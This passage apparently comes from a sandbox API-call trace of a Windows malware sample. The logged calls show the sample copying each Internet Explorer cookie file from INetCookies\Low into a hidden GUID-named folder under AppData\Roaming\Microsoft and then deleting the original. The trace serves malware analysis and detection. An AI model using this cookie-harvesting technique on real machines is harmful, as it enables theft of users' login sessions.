lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.557] StrChrW (lpStart="Low\\JQOCYKOH.txt", wMatch=0x74c005c) returned="\\JQOCYKOH.txt" [0252.557] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.557] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.557] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.557] StrChrW (lpStart="JQOCYKOH.txt", wMatch=0x74c005c) returned 0x0 [0252.557] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="JQOCYKOH.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\JQOCYKOH.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\JQOCYKOH.txt" [0252.557] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\JQOCYKOH.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\jqocykoh.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\JQOCYKOH.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\jqocykoh.txt"), bFailIfExists=0) returned 1 [0252.588] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\JQOCYKOH.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\jqocykoh.txt")) returned 1 [0252.589] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.589] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.589] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.589] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.589] StrChrW (lpStart="Low\\JWFWLAYR.txt", wMatch=0x74c005c) returned="\\JWFWLAYR.txt" [0252.589] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.589] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.589] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.589] StrChrW (lpStart="JWFWLAYR.txt", wMatch=0x74c005c) returned 0x0 [0252.589] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="JWFWLAYR.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\JWFWLAYR.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\JWFWLAYR.txt" [0252.589] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\JWFWLAYR.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\jwfwlayr.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\JWFWLAYR.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\jwfwlayr.txt"), bFailIfExists=0) returned 1 [0252.594] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\JWFWLAYR.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\jwfwlayr.txt")) returned 1 [0252.595] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.595] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.595] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.595] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.595] StrChrW (lpStart="Low\\K8249Y1G.txt", wMatch=0x74c005c) returned="\\K8249Y1G.txt" [0252.595] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.595] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.595] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.595] StrChrW (lpStart="K8249Y1G.txt", wMatch=0x74c005c) returned 0x0 [0252.595] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="K8249Y1G.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\K8249Y1G.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\K8249Y1G.txt" [0252.595] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\K8249Y1G.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\k8249y1g.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\K8249Y1G.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\k8249y1g.txt"), bFailIfExists=0) returned 1 [0252.600] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\K8249Y1G.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\k8249y1g.txt")) returned 1 [0252.601] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.601] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.601] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.601] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.601] StrChrW (lpStart="Low\\KNJ4AJDH.txt", wMatch=0x74c005c) returned="\\KNJ4AJDH.txt" [0252.601] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.601] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.601] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.601] StrChrW (lpStart="KNJ4AJDH.txt", wMatch=0x74c005c) returned 0x0 [0252.601] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="KNJ4AJDH.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\KNJ4AJDH.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\KNJ4AJDH.txt" [0252.601] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\KNJ4AJDH.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\knj4ajdh.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\KNJ4AJDH.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\knj4ajdh.txt"), bFailIfExists=0) returned 1 [0252.608] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\KNJ4AJDH.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\knj4ajdh.txt")) returned 1 [0252.609] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.609] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.609] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.609] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.609] StrChrW (lpStart="Low\\L78EW25D.txt", wMatch=0x74c005c) returned="\\L78EW25D.txt" [0252.609] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.610] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.610] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.610] StrChrW (lpStart="L78EW25D.txt", wMatch=0x74c005c) returned 0x0 [0252.610] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="L78EW25D.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\L78EW25D.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\L78EW25D.txt" [0252.610] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\L78EW25D.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\l78ew25d.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\L78EW25D.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\l78ew25d.txt"), bFailIfExists=0) returned 1 [0252.618] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\L78EW25D.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\l78ew25d.txt")) returned 1 [0252.619] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.619] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.619] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.619] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.619] StrChrW (lpStart="Low\\LC10XEWL.txt", wMatch=0x74c005c) returned="\\LC10XEWL.txt" [0252.619] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.620] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.620] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.620] StrChrW (lpStart="LC10XEWL.txt", wMatch=0x74c005c) returned 0x0 [0252.620] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="LC10XEWL.txt" | out: 